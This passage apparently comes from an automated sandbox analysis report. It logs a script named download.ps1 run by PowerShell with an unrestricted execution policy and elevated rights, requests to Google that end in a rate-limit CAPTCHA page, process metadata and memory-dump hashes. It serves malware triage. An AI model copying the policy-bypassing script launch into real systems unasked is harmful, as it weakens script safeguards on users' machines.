Dec 20, 2024 17:41:15.516571999 CET | 166 | IN | HTTP/1.1 302 Found
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 20 Dec 2024 16:41:15 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.google.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.30 | 49847 | 142.250.217.164 | 80 | 5908 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 17:41:15.781240940 CET | 159 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
Host: www.google.com
Connection: Keep-Alive
Dec 20, 2024 17:41:16.471636057 CET | 1289 | IN | HTTP/1.1 302 Found
                                                                  Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFDpHXZFok_V8ZMFQDummoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                  x-hallmonitor-challenge: CgwIrLyWuwYQ0NarsAESBGaBmM0
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-BEeYde2zbM7DwRIs5RgBNA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                  Date: Fri, 20 Dec 2024 16:41:16 GMT
                                                                  Server: gws
                                                                  Content-Length: 396
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Set-Cookie: AEC=AZ6Zc-Uc9SI857GTKEIMwg7dp6ca0j4zkdBprUXio5-Uq2kxkROwApKO0g; expires=Wed, 18-Jun-2025 16:41:16 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                  Set-Cookie: NID=520=eJyEIlHRWOrNmm3PTfwJw7iwIju0uTydR31wGf9D4xQtRSSd97A4zZ5x3kPQqfFsCXGTC0yCOtlfajGLNwzwaoBiykAYmqk9UekyKLvgh04i65ztx-VWhPgBuVrvInEoh1aTs0rbdhXVKODQvJCy3nWDwuLQhcY1Az8Z_YXbaO539d7qOm6BY9trt1KtMh26-WfX; expires=Sat, 21-Jun-2025 16:41:15 GMT; path=/; domain=.google.com; HttpOnly
                                                                  Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d
                                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/htm
Dec 20, 2024 17:41:16.471668959 CET | 335 | IN | Data Raw: 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63
                                                                  Data Ascii: l;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://www.google.com/sorry/index?continue=http://www.google.com/&amp;q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFD
Dec 20, 2024 17:41:16.472948074 CET | 522 | OUT | GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFDpHXZFok_V8ZMFQDummoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                  Host: www.google.com
                                                                  Cookie: NID=520=eJyEIlHRWOrNmm3PTfwJw7iwIju0uTydR31wGf9D4xQtRSSd97A4zZ5x3kPQqfFsCXGTC0yCOtlfajGLNwzwaoBiykAYmqk9UekyKLvgh04i65ztx-VWhPgBuVrvInEoh1aTs0rbdhXVKODQvJCy3nWDwuLQhcY1Az8Z_YXbaO539d7qOm6BY9trt1KtMh26-WfX
Dec 20, 2024 17:41:16.615920067 CET | 1289 | IN | HTTP/1.1 429 Too Many Requests
                                                                  Date: Fri, 20 Dec 2024 16:41:16 GMT
                                                                  Pragma: no-cache
                                                                  Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Content-Type: text/html
                                                                  Server: HTTP server (unknown)
                                                                  Content-Length: 3076
                                                                  X-XSS-Protection: 0
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 20 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 20 66 6f 6e 74 2d [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>http://www.google.com/</title></head><body style="font-family: arial, sans-serif; background-color: #fff; color: #000; padding:20px; font-size:18px; overscroll-behavior:contain;" onload="e=document.getElementById('captcha');if(e){e.focus();} if(solveSimpleChallenge) {solveSimpleChallenge(,);}"><div style="max-width:400px;"><hr noshade size="1" style="color:#ccc; background-color:#ccc;"><br><form id="captcha-form" action="index" method="post"><noscript><div style="font-size:13px;"> In order to continue, please enable javascript on your web browser.</div></noscript><script src="https://www.google.com/recaptcha/api.js" async defer></script><script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" dat
Dec 20, 2024 17:41:16.616164923 CET | 1289 | IN | Data Raw: 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b
                                                                  Data Ascii: a-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="-JtkE8DVUD5OBxfUnix3Jf4WYyUhVu45przpKL-vs5SG1Za7pFDmWF1-Jpye0NrUKtARWGM4R9va8j4V0ippDuXP4vwUJzlCpOwle_7XhEMbTzCKdCo6WjergZCUxFcko0drgNnL7JEiqc5B1hs6D3W
Dec 20, 2024 17:41:16.616177082 CET | 778 | IN | Data Raw: 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74
                                                                  Data Ascii: ervice</a>. The block will expire shortly after those requests stop. In the meantime, solving the above CAPTCHA will let you continue to use our services.<br><br>This traffic may have been sent by malicious software, a browser plug-in, or a s



Target ID: 1
Start time: 11:41:09
Start date: 20/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Imagebase: 0x7ff709d20000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 11:41:09
Start date: 20/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6cc9c0000
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *GA
                                                                    • API String ID: 0-2864567849
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643115570595.00007FFA7B320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B320000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b320000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: P;-{
                                                                    • API String ID: 0-629811348
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643110767515.00007FFA7AF5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7AF5D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7af5d000_powershell.jbxd
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643115570595.00007FFA7B320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B320000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b320000_powershell.jbxd
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (i0{${
                                                                    • API String ID: 0-1353647558
                                                                    • Opcode ID: 066e08eed228c3728ffd33243e2f3ef587118000fea30432a800fe65464e3d24
                                                                    • Instruction ID: 6b60e47fb327523cd98d84aa48f29742dd942fd43d915ac592e9c7bcf431093e
                                                                    • Opcode Fuzzy Hash: 066e08eed228c3728ffd33243e2f3ef587118000fea30432a800fe65464e3d24
                                                                    • Instruction Fuzzy Hash: C4D1C7A3A1D6C65BEB62973C58A94E9BF50EF53175B0880FBC44C8F0ABED1878478351
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: {
                                                                    • API String ID: 0-366298937
                                                                    • Opcode ID: b1948560f8d53cd0c5e7668564b568c5584bedc7a4132df78662cb8f686dc3a6
                                                                    • Instruction ID: f0aa4dd686c28f612d2d53fcfec1eea788ad5c73360708aade35f4763eaa66e6
                                                                    • Opcode Fuzzy Hash: b1948560f8d53cd0c5e7668564b568c5584bedc7a4132df78662cb8f686dc3a6
                                                                    • Instruction Fuzzy Hash: B23284A3A1D7C24FE352472858A98E57FA0EF5326470980F7C489CB4B7E91D790B8762
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @{$0@{$8@{$8@{$@@{$X@{$X@{$^T_I$`@{$h@{$x@{$@{
                                                                    • API String ID: 0-4253421388
                                                                    • Opcode ID: e9106dd8c3209b5f76804f2a4a4634ef69c4225d673c916e6a192a1b27ff7f35
                                                                    • Instruction ID: aa05b9b8bf7341913610ac7963d05eaa23ca9033d5510fd6fbd813290345b1b2
                                                                    • Opcode Fuzzy Hash: e9106dd8c3209b5f76804f2a4a4634ef69c4225d673c916e6a192a1b27ff7f35
                                                                    • Instruction Fuzzy Hash: CC61E3E3E4F7C50BE565825C681A475AF85EB432A176885FBE04C070AF6C39B91B8285
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643115148917.00007FFA7B2E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B2E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b2e0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `u){$s-{$s-{$s-{$s-{$s-{$s-{$s-{
                                                                    • API String ID: 0-3497940576
                                                                    • Opcode ID: 55bfcc8e11f47d91cdc89dbad36ab8e502668e117776c95b099a29682ba80532
                                                                    • Instruction ID: 0a6f47d8337bd7a8302435aefbd31450062fadb8fcf00b9bf3c4c5ac111bbb22
                                                                    • Opcode Fuzzy Hash: 55bfcc8e11f47d91cdc89dbad36ab8e502668e117776c95b099a29682ba80532
                                                                    • Instruction Fuzzy Hash: 8AD1277291E7898FE795EB2988999683FA1FF57350B1841FED40DC71B7D928AC02C381
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: =T_^$T_^$T_^$T_^$T_^$T_^
                                                                    • API String ID: 0-75591508
                                                                    • Opcode ID: ce6b69a16ae2df40f92459bd3ef8b22dc800d7cfaabd2c597ae229542cf91ee7
                                                                    • Instruction ID: 3654b6e2393e284b00e9edfdd38d2a5b930fb99d4524384a607dae9ad24c8d57
                                                                    • Opcode Fuzzy Hash: ce6b69a16ae2df40f92459bd3ef8b22dc800d7cfaabd2c597ae229542cf91ee7
                                                                    • Instruction Fuzzy Hash: 4FC178A3E1D6D75FF722572868A94E83FE0EF632A471940B7C4CC4E4A7B908354B8651